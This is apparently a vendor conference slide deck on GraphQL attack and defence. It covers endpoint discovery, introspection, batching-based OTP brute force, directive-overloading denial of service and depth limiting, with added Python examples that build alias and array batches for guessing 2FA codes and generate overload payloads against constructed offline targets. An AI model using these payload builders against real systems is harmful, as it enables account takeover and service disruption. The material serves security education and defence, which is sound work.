Slide 1

The Dark Side of GraphQL
GraphQL is so query-ous, it's bound to leave you REST-less.
02.28.2023

Slide 2

Why GraphQL?
• Increased efficiency: request exactly the data you need, nothing more, nothing less
• Better flexibility: evolve and iterate on the API without impacting clients
• Facilitates collaboration: GraphQL provides a common language for both frontend and backend
Pun: Why settle for the simplicity of REST when you can spend your days writing complex GraphQL schemas that nobody understands?
Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED

Slide 3

How is GraphQL Different from REST?

Slide 4

Common GraphQL Endpoints
Tip: I would rather create a wordlist of common GraphQL endpoints and pass it to ffuf, DirBuster, etc.
1. /graphql
2. /graphql.php
3. /graphiql
4. /v1/explorer
5. /v1/graphiql
6. /v2/graphql/console
List of Common API Endpoints
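A wordlist alone only tells you which paths exist; what you want is which of them speak GraphQL. The script below is an added example, not part of the deck: it POSTs the smallest valid document (`{ __typename }`) to each candidate path and classifies the answer by response shape rather than status code, so an endpoint that rejects the probe with a spec-shaped `errors` list is still flagged. The two extra paths appended to the slide's six, the `target.example` host and the canned responses in `FAKE_SITE` are constructed for offline use; swap `fake_fetch` for `http_fetch` against a real target.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, List, Tuple

# The six paths from the slide, plus two extra common variants (assumption, not from the slide).
GRAPHQL_WORDLIST = [
    "/graphql", "/graphql.php", "/graphiql", "/v1/explorer",
    "/v1/graphiql", "/v2/graphql/console", "/api/graphql", "/query",
]

# Smallest valid GraphQL document: every schema exposes __typename on its root type.
PROBE_BODY = json.dumps({"query": "{ __typename }"})

Fetch = Callable[[str, str], Tuple[int, str]]  # (url, json body) -> (status, response body)


def looks_like_graphql(body: str) -> bool:
    """A GraphQL endpoint answers the probe with {"data": {"__typename": ...}} or, when it
    rejects the request, with a JSON object carrying a top-level "errors" list whose
    entries have a "message" (the response shape required by the GraphQL spec)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict):
        return False
    data = doc.get("data")
    if isinstance(data, dict) and "__typename" in data:
        return True
    errors = doc.get("errors")
    return (isinstance(errors, list) and len(errors) > 0
            and all(isinstance(e, dict) and "message" in e for e in errors))


def probe_endpoints(base_url: str, wordlist: List[str], fetch: Fetch) -> List[str]:
    """POST the probe to every candidate path and keep the ones that speak GraphQL."""
    return [p for p in wordlist if looks_like_graphql(fetch(base_url + p, PROBE_BODY)[1])]


def http_fetch(url: str, body: str) -> Tuple[int, str]:
    """Real transport for live use; not exercised offline."""
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")
    except (urllib.error.URLError, OSError):
        return 0, ""


# Constructed fake target so the script runs offline: a live endpoint, a static GraphiQL
# page (a UI, not the API itself), and an endpoint that rejects the probe but is still GraphQL.
FAKE_SITE = {
    "/graphql": (200, '{"data":{"__typename":"Query"}}'),
    "/graphiql": (200, "<html><title>GraphiQL</title></html>"),
    "/v1/explorer": (400, '{"errors":[{"message":"Must provide query string."}]}'),
}


def fake_fetch(url: str, body: str) -> Tuple[int, str]:
    return FAKE_SITE.get(url.replace("https://target.example", "", 1), (404, "Not Found"))


if __name__ == "__main__":
    print(probe_endpoints("https://target.example", GRAPHQL_WORDLIST, fake_fetch))
```

Note that `/graphiql` is reported as a miss here: a GraphiQL page is an HTML console that talks to some other endpoint, so finding it is a lead, not a hit. Some servers only accept queries via GET with `?query=`; if a POST probe returns 405, retry the same document as a query-string parameter before ruling the path out.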

Slide 5

DIFFERENT TYPES OF QUERIES IN GRAPHQL
Pun: "A GraphQL query is like a conversation with a waiter at a restaurant. You tell the waiter what you want to eat (i.e., the data you want to retrieve), and the waiter brings it to your table. But unlike a restaurant, you don't have to leave a tip!"

Slide 6

QUERY
A query is used to retrieve data from a GraphQL server. It is analogous to a GET request in a REST API. A query consists of a set of fields that define the data the client wants to fetch from the server.

MUTATION
A mutation is used to modify data on a GraphQL server. It is analogous to a POST, PUT, or DELETE request in a REST API. A mutation consists of a set of input arguments and fields that define the data the client wants to change on the server.

SUBSCRIPTION
A subscription is used to receive real-time updates from a GraphQL server. It is similar to a query, but instead of returning a single result, a subscription returns a stream of data that is pushed to the client whenever the server's data changes.

The GET/POST analogy describes read versus write semantics only: in practice queries and mutations are both usually sent as HTTP POST to the same endpoint, and many servers also accept queries over GET, which matters when testing for CSRF.

Slide 7

ATTACKER'S PERSPECTIVE TO GRAPHQL
Pun: Why did the GraphQL developer refuse to use REST? Because they didn't want to get caught up in a "REST-riction" when it came to querying data!

Slide 8

THE INTROSPECTION
Pun: Why did the GraphQL schema go to therapy? Because it needed some introspecc-tion!
GraphQL introspection is a feature that allows a GraphQL client to query the GraphQL schema at runtime to get information about the available types, fields, and directives the schema supports. This information can be used to understand the schema's structure, generate documentation, or even dynamically generate GraphQL queries and mutations.
INTROSPECTION QUERY

Slide 9

Why is Introspection a vulnerability?
Introspection can reveal sensitive information about the application's underlying data model. It is enabled by default in most server implementations, and the schema it returns includes every type, field, argument and mutation the backend supports, not only the ones the front end happens to use.
Tip: The output of introspection might not be readable. To view it in a much better way use "apis.guru/graphql-voyager/".
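The raw introspection response is thousands of lines of JSON; the work of the attacker (or the defender reviewing exposure) is to pull out what matters: the root operation types, the mutations, and field names that hint at data the model should not expose. The script below is an added example, not part of the deck or of any tool it mentions. It carries a trimmed introspection document (enough for types, fields and root types; the full one used by GraphiQL also pulls arguments, enums, directives and descriptions) and a summariser. `SAMPLE_INTROSPECTION` is a constructed response standing in for what a live endpoint returns, and `SENSITIVE_PATTERN` is an assumed list of keywords to tune per engagement.

```python
import re

# Trimmed introspection document: root operation types plus every type's fields.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      kind
      name
      fields { name type { kind name ofType { kind name ofType { kind name } } } }
    }
  }
}
"""

# Assumed keywords that usually mark fields the data model should not expose.
SENSITIVE_PATTERN = re.compile(r"(password|secret|token|ssn|salt|isadmin|apikey|otp)", re.I)


def _named_type(t):
    """Unwrap NON_NULL / LIST wrappers down to the named type."""
    while t and t.get("name") is None and t.get("ofType"):
        t = t["ofType"]
    return t.get("name") if t else None


def summarize_schema(introspection: dict) -> dict:
    """Reduce an introspection response to roots, object types, mutations and
    sensitive-looking fields. Built-in __* types are skipped."""
    schema = introspection["data"]["__schema"]
    roots = {k: (schema.get(k) or {}).get("name")
             for k in ("queryType", "mutationType", "subscriptionType")}
    types = {}
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        types[t["name"]] = {f["name"]: _named_type(f["type"]) for f in (t.get("fields") or [])}
    sensitive = [f"{tn}.{fn}" for tn, fields in types.items()
                 for fn in fields if SENSITIVE_PATTERN.search(fn)]
    mutations = sorted(types.get(roots["mutationType"], {})) if roots["mutationType"] else []
    return {"roots": roots, "types": types, "mutations": mutations, "sensitive_fields": sensitive}


# Constructed response, shaped like a real server's answer to INTROSPECTION_QUERY.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}, "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "me", "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "users", "type": {"kind": "LIST", "name": None,
                                       "ofType": {"kind": "OBJECT", "name": "User", "ofType": None}}}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "login", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
            {"name": "resetPassword", "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "type": {"kind": "NON_NULL", "name": None,
                                    "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}},
            {"name": "email", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
            {"name": "passwordHash", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
            {"name": "isAdmin", "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"kind": "SCALAR", "name": "String", "fields": None},
        {"kind": "OBJECT", "name": "__Type", "fields": []},
    ]}}}

if __name__ == "__main__":
    summary = summarize_schema(SAMPLE_INTROSPECTION)
    print("mutations:", summary["mutations"])
    print("sensitive:", summary["sensitive_fields"])
```

Against a live target, POST `{"query": INTROSPECTION_QUERY}` to the endpoint, save the body, and feed the parsed JSON to `summarize_schema`. The interesting output is usually the mutation list (password resets, role changes, internal admin calls) and fields such as `User.passwordHash` that exist in the model whether or not any resolver is meant to return them.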

Slide 10

Why we use graphql-voyager?

Slide 11

I call it "The Voyager Magic"

Slide 12

Slide 13

Can we exploit Batching in GraphQL?
Batching is a technique used in GraphQL to optimize queries by allowing multiple queries to be sent in a single HTTP request. It comes in two forms: a JSON array of operations in one request body, and aliases that call the same field several times inside a single operation. Either way, anything that counts HTTP requests (rate limiters, WAF rules, attempt counters) sees one request.
Tip: GraphQL batching is not inherently a vulnerability, but ... let's find out.

Slide 14

EXPLOIT FOR BATCHING
Tip: Use the "BatchQL" tool by Assetnote.
The most common attack on batching is a Denial of Service (DoS). If an attacker sends a large number of batched queries that require significant processing, the server can become overwhelmed, resulting in a denial of service.
PoC in next slide

Slide 15

Note the Execution Time

Slide 16

Ahm... Ahm...

Slide 17

Authentication Bypass with the help of Batching
Tip: Works mainly where 2FA is present. The OTP verification step is usually protected by a per-request attempt counter, and a batch of guesses counts as a single request.

Slide 18

BYPASSING 2FA
Tip: Use the "BatchQL" tool by Assetnote.
We can see that we pass 3 different verification codes in one request, and if even one code is correct, we get the successful response.
Credit: Assetnote
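The following is an added example, not from the deck or from BatchQL, that makes the batching point from slides 13 to 18 concrete in both directions. The attacker side builds the two batch shapes (a JSON array of operations, and a single operation with aliases, which works even where the server rejects arrays); the defender side is a toy OTP verifier whose only knob is whether it charges the attempt counter per HTTP request or per `verifyOtp` call. The `verifyOtp` mutation, the `session` argument, the `jwt-for-` token and the secret `483920` are all constructed for the demo. The same builders, with an expensive query in place of `verifyOtp`, produce the DoS payload from slide 14.

```python
import json
import re
from typing import Dict, List, Optional

VERIFY_OP = "mutation($s: String!, $c: String!) { verifyOtp(session: $s, code: $c) { token } }"


# --- attacker side: two ways to pack many guesses into ONE HTTP request ---

def array_batch(codes: List[str], session: str) -> str:
    """JSON-array batching: one HTTP body carrying one operation per guess."""
    return json.dumps([{"query": VERIFY_OP, "variables": {"s": session, "c": c}} for c in codes])


def alias_batch(codes: List[str], session: str) -> str:
    """Alias batching: a single operation calling the same mutation under N aliases."""
    fields = "\n".join(f'  g{i}: verifyOtp(session: "{session}", code: "{c}") {{ token }}'
                       for i, c in enumerate(codes))
    return json.dumps({"query": "mutation {\n" + fields + "\n}"})


# --- defender side: toy verifier showing why a per-request limit is not a limit ---

CORRECT_OTP = "483920"  # constructed secret for the demo
ALIAS_CALL_RE = re.compile(r'verifyOtp\(session: "([^"]*)", code: "([^"]*)"\)')


class OtpServer:
    """count_operations=False charges one attempt per HTTP request (the flawed pattern);
    True charges one attempt per verifyOtp call, whichever batch shape carried it (the fix)."""

    def __init__(self, max_attempts: int, count_operations: bool):
        self.max_attempts = max_attempts
        self.count_operations = count_operations
        self.attempts: Dict[str, int] = {}

    def handle(self, body: str) -> List[dict]:
        doc = json.loads(body)
        ops = doc if isinstance(doc, list) else [doc]
        calls = []  # every (session, code) pair this request asks us to verify
        for op in ops:
            if op.get("variables"):
                calls.append((op["variables"]["s"], op["variables"]["c"]))
            else:  # alias batch: pull the literal arguments out of the query text
                calls.extend(ALIAS_CALL_RE.findall(op["query"]))
        session = calls[0][0]
        charged = len(calls) if self.count_operations else 1
        used = self.attempts.get(session, 0)
        if used + charged > self.max_attempts:
            return [{"errors": [{"message": "too many attempts"}]}]
        self.attempts[session] = used + charged
        return [{"data": {"verifyOtp": {"token": "jwt-for-" + s} if c == CORRECT_OTP else None}}
                for s, c in calls]


def brute_force(server: OtpServer, codes: List[str], session: str, builder) -> Optional[str]:
    """One HTTP request, many guesses; returns the session token if any guess landed."""
    for r in server.handle(builder(codes, session)):
        hit = (r.get("data") or {}).get("verifyOtp")
        if hit:
            return hit["token"]
    return None


if __name__ == "__main__":
    guesses = [f"{i:06d}" for i in range(483000, 484000)]  # 1000 guesses in one request
    print("per-request limit :", brute_force(OtpServer(5, False), guesses, "s1", array_batch))
    print("per-operation limit:", brute_force(OtpServer(5, True), guesses, "s1", array_batch))
```

With the per-request counter, a thousand guesses cost one attempt and the correct code is found in a single round trip; with the per-operation counter the whole batch is refused. Real fixes also cap the number of operations and aliases a request may carry, since an attacker who is charged per call will otherwise still get the DoS variant.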

Slide 19

Testing for Directive Overloading
Tip: Directive overloading is neglected because developers and hackers concentrate on batching. Let's see a live PoC.

Slide 20

WHAT ARE RUNTIME DIRECTIVES?
The purpose of runtime directives is to modify execution. There are two main runtime directives in GraphQL: @skip and @include.
• @skip(if: ...) skips the selection if the if: ... value is true
• @include(if: ...) includes the selection if the if: ... value is true
Note the Execution Time
Tip: Multiple errors in the response confirm that the server parsed and validated every repeated directive; if the execution time grows with the number of copies, the server is vulnerable to directive overloading.
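An added example (not from the deck) for the overloading test above: the attacker's generator repeats `@include(if: true)` on one field so the server's parser and validator do work proportional to the count, and a cheap pre-validation gate that counts directives in the raw document before the parser sees it. `MAX_DIRECTIVES` is an assumed budget, and the regex gate is deliberately approximate (it will also count `@include` inside a string literal, which only makes it stricter).

```python
import re

DIRECTIVE_RE = re.compile(r"@(skip|include)\b")
MAX_DIRECTIVES = 10  # assumed budget; tune per schema


def directive_overload_query(field: str, count: int) -> str:
    """Build a query whose single field carries `count` copies of @include(if: true).
    The spec does not mark @include/@skip as repeatable, so a compliant validator
    reports one error per duplicate, but only after parsing all of them."""
    directives = " ".join("@include(if: true)" for _ in range(count))
    return "query { " + field + " " + directives + " }"


def directive_count(query: str) -> int:
    """Number of @skip / @include directives in the raw document text."""
    return len(DIRECTIVE_RE.findall(query))


def guard(query: str):
    """Pre-parse gate: refuse the document before the parser spends O(count) on it.
    Returns a GraphQL-shaped error object, or None if the query may proceed."""
    n = directive_count(query)
    if n > MAX_DIRECTIVES:
        return {"errors": [{"message": f"too many directives: {n} > {MAX_DIRECTIVES}"}]}
    return None


if __name__ == "__main__":
    payload = directive_overload_query("__typename", 5000)
    print(len(payload), "bytes,", directive_count(payload), "directives")
    print(guard(payload))
    print(guard("query { user(id: 1) { name @include(if: true) } }"))
```

When testing live, send the generated query at increasing counts (100, 1,000, 10,000) and watch response time rather than the body: a server that applies a limit answers the large ones in constant time with a single error, while a vulnerable one gets slower and returns one validation error per copy.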

Slide 21

Slide 22

POSSIBLE MITIGATIONS
• Implement depth limiting for incoming GraphQL queries
• Perform query cost analysis to limit expensive queries
• Enforce rate limiting for incoming requests per API client, counting operations and aliases rather than HTTP requests
• Add timeouts at both the infrastructure and API layers
• Disable introspection queries in public APIs (this is hardening, not a fix: field names can still be guessed from error messages and "did you mean" suggestions)
• Use an allowlist of permitted characters
• Add pagination to limit the amount of information that can be accessed by a single request
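Depth limiting is the first item on the list and the easiest to get subtly wrong, so here is an added example (not from the deck) of the check itself: a scanner that measures selection-set nesting on the raw document while ignoring braces inside string literals, block strings and comments, plus a gate that turns the measurement into a GraphQL-shaped error. The depth budget of 3 used in the demo is an assumption.

```python
from typing import Optional


def query_depth(query: str) -> int:
    """Maximum nesting depth of selection sets in a GraphQL document.
    The outermost { } counts as depth 1. Braces inside "strings", triple-quoted
    block strings and # comments are ignored so they cannot skew the count."""
    depth = max_depth = 0
    i, n = 0, len(query)
    while i < n:
        if query.startswith('"""', i):          # block string
            end = query.find('"""', i + 3)
            i = n if end == -1 else end + 3
            continue
        ch = query[i]
        if ch == '"':                            # ordinary string, honour \" escapes
            i += 1
            while i < n and query[i] != '"':
                i += 2 if query[i] == "\\" else 1
        elif ch == "#":                          # comment runs to end of line
            while i < n and query[i] != "\n":
                i += 1
        elif ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
        i += 1
    return max_depth


def check_query(query: str, max_depth: int) -> Optional[dict]:
    """Return a GraphQL-shaped error if the document nests deeper than allowed."""
    d = query_depth(query)
    if d > max_depth:
        return {"errors": [{"message": f"query depth {d} exceeds limit {max_depth}"}]}
    return None


if __name__ == "__main__":
    # Constructed recursive query of the kind a self-referential schema allows.
    deep = "{ me { friends { friends { friends { name } } } } }"
    print(query_depth(deep), check_query(deep, max_depth=3))
    print(check_query("{ me { name } }", max_depth=3))
```

A raw-text scanner is enough to reject the obvious recursive query before parsing, but fragments can hide depth: `{ me { ...F } } fragment F on User { friends { ...G } }` scores 2 here while the effective depth is larger. Production limiters (graphql-depth-limit and the equivalents in other servers) therefore work on the parsed AST with fragment spreads expanded; treat this check as the cheap first layer in front of that, alongside cost analysis for wide-but-shallow queries that depth alone does not catch.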

Slide 23

To Succeed, Security Teams Need Unified API Protection
An Integrated Solution Across the Entire API Protection Lifecycle
Continuous API Protection Lifecycle:
• Discovery: Identify public-facing APIs
• Inventory: Provide a unified inventory of ALL APIs
• Compliance: Ensure adherence to security and governance best practices
• Testing: Secure new APIs before go-live
• Prevention: Block attacks natively in real time
• Detection: Detect attacks as they happen

Slide 24

Thank You
Merci · Gracias · Danke · Grazie · Dhanyavaad · Shukraan · Arigato
Did someone mention that Cequence can provide you with a free security assessment?